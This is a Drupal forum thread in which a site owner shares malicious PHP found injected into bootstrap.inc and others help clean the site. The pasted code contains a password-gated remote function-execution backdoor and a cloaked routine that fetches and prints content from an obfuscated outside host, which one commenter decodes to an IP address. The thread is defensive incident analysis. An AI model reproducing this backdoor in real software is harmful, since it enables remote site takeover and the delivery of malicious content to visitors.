By Darn on

Hello!

My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).

This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.

The drupal 7 is updated to 7.41, the modules are up to date. The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:

$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'],   @$p['c'], '');

if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
    $bad_url = true;
    break;
}
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
 //    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
 //        $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
    $echo_done = true;
    print $decoded;
}
}//iend

I'm no back-end developer and I've been using bootstrap for hobby related-project for over 8 years.

I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.

Does anyone have any idea, how to block this changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where its coming from?

Thank you in advance.

Categories: Drupal 7.x

Comments

bantar’s picture

bantar commented

I found this article for you that might give you a clue as to what is happening. http://labs.sucuri.net/notes/2015-12-28

I'm no Drupal expert, so someone else will need to help you figure out how this creeps back in. This appears to be the dirty code:

$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
    $echo_done = true;
    print $decoded;
}

However, you have other dirty code somewhere because the function decrypt_url() is not in this snippet. Using the website mentioned above, I think this URL decrypts to the following string:
http://35.87.63.92/blog/?alpha&utm_source=70334:781141:1912

This site appears to be down. Your page is timing out on loading that URL and is the likely cause of your page load delay. Hope this helps. Good luck.

Darn’s picture

Darn commented

Thanks a lot! This link is a nice find, I'm going to check it, and perhaps contact with Sucuri.
I'll try to post an update if I'll solve this.

martin0101’s picture

martin0101 commented

Hello Darn,

I've got the same thing on a server. I've cleaned somes files with suspicious code, but I still got that code back.

Have you resolved your problem ?

Darn’s picture

Darn commented

Hey martin0101,
In some way yes. After countless tries, one day I just removed (not replace, or update, but remove) all the themes I had. It was a totaly my mistake that apart from replacing Drupal with a fresh install I kept some old un-updated, non-default themes (I forgot about them).

But it was a lucky shot, a suspicious code could be anywhere and it might not in the end, help you. However Micheal on stackoverflow (link below) had different solution which I didin't really try:
http://stackoverflow.com/questions/35044627/includes-bootstrap-inc-hacke...

Maybe it'll help.

Overall I'd advice (if nothing will help) to delete (*backup first!) and reupload everything you have, except theme specific CSS or own personal modifications. I'm pretty sure that until I got it cleaned, I've replaced everything (apart from theme CSS).

martin0101’s picture

martin0101 commented

Hey Darn,

Thanks a lot for your quick follow up and i'll check ou that way.

I've found that post this morning, then I've removed some weird "preg_replace" and thoses look to be related to the theme.

VM’s picture

VM commented

Was the site every running Drupal pre 7.32? Was the site updated within hours of the 7.32 release? If not, then the backdoor could be in the database. see: https://www.drupal.org/node/2357241